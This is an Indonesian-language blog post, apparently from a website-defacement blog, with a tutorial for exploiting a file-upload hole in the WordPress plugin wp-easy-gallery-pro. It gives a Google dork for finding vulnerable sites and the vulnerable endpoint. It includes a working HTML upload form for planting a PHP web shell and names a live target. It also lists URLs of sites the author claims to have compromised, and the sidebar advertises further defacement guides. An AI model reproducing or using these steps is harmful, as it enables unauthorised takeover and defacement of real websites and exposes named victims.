Selamat Siang gan hehehe ketemu lagi sama saya Admin yg paling kece& Tamvan wkwkkwkw :v
Oke Sekarang saya mau berbagi Tutorial Seperti Biasa Yaitu Wp-Easy-Gallery-Pro ya Walaupun ini termasuk POC Jadul apa salah Nya Kita Mengupas Lagi Lebih Dalam Biar Mendesah wkwkwk :v
Oke Langsung aja Agan Simak ;)
Bahan :
-Dork " /wp-content/plugins/wp-easy-gallery-pro/ "
-CSRF
-Kopi
-Internet
-Waktu
-Exploit " /wp-content/plugins/wp-easy-gallery-pro/admin/php.php "
-Kesabaran <== ini nih Yg Paling Penting gan :v
-Live TARGET " http://tormoveis.com/ " <== Di mohon Jangan di rusak Gan
1.Masukkan Dorknya di Google .. Dork Bisa di Kembangin Lagi Ya Gan di Kasih Site,intext Dll Biar dapet yg masih Perawan :v
2.Setelah kira" Dapet Target yg Vuln Masukkan Exploit nya..
3.Apabila Vuln ada Tulisan {"error":"No files were uploaded."} Atau Blank... Apabila NotFound Dll Silahkan Next target aja Gan :v
4.Setelah Itu Agan Masukkan Target Beserta Exploit Tadi Ke dalam CSRF Nya Gan
CSRF:
<form enctype="multipart/form-data"
action="http://www.contohweb.com/wp-content/plugins/wp-easy-gallery-pro/admin/php.php" method="post">
<input type="jpg" name="url" value="./" /><br />
Please choose a file: <input name="qqfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
5.Setelah itu CSRF nya di simpan dengan Extensi .html
6.Buka CSRF tadi lalu UPLOAD Shell Agan Apabila ada Tulisan Bla Bla Success Itu tandanya Shell agan Sudah Terupload
7.Buka Letak shell agan Upload Tadi di " /wp-content/uploads/shellagan.php " dan Terserah agan Mau di apakan :v Dosa di tanggung Sendiri gan :p
Nih Hasil Saya Gan : http://tormoveis.com/wp-content/uploads/aku.jpg
http://www.madcityblues.tv/wp-content/uploads/Screenshot_25.png.jpg
http://maherserv.com/wp-content/uploads/Screenshot_25.png.jpg
Sekian Tutorial kali ini Samapai Bertemu Kembali di Lain Waktu Gan Bye ;)
Mohon di Berikan Sumber Kalau Mau COPAS Gan :D
Popular Posts
-
- Author: CoderSec - Date: 25/07/2014 - Tested on : Windows Dork: inurl:/download.php?file= inurl:/force-download.php?file= Explo...
-
Halo Sob Jumpa Lagi dengan saya Admin Blog yg Paling TamVan hehehe.. Oke Kali ini saya akan Share Cara Deface website OJS ( Open Journa... -
Oke Vroh Gue Kali ini Mw Share Tehnik Deface Web Sekolah Dengan CRSF Balitbang sebenernya Tehnik ini Udah Jadul Tapi Kalok Bisa Dorking Mah ... -
1. Yang termasuk tahap perawatan aktif untuk operating system adalah… a. Membersihkan keyboard dan mouse b. Mengec...
-
Situs CTEF Cyber Academy di Retas Oleh Seoarang Defacer Dari Indonesia Yaitu dengan Nick name " ./51N1CH1 " Defacer ini Hanya Meru... -
Selamat Siang gan hehehe ketemu lagi sama saya Admin yg paling kece& Tamvan wkwkkwkw :v Oke Sekarang saya mau berbagi Tutorial Seperti ...
-
Oke Gan Selamat Datang Kembali di Blog JIC-Team hehehe Udh lama Nih Mimin Gak UPDATE tentang Tutorial Khusus nya Dalam DEFACE .. ^_^ Lanjut ...
-
Halo Guys apa kabar hehe Udah Lama Nih Gak Update Live Target Deface Joomla Yaitu Com User oke Langsung aja Di coba Guys ;) JaNgan di rusak ...
-
intext: Joomla!® ist freie, unter der GNU/GPL-Lizenz , veröffentlichte Software intext:+00:00 12 01 2017 Joomla! 1.7 Open Source intext:B...
-
Jumpa Lagi dengan saya Admin Tamvan :v oke kali ini saya akan share Dork Com_User Terbaru pasti udah pada Penasaran Ya :v hahaha oke silahka...
1 comments:
Post a Comment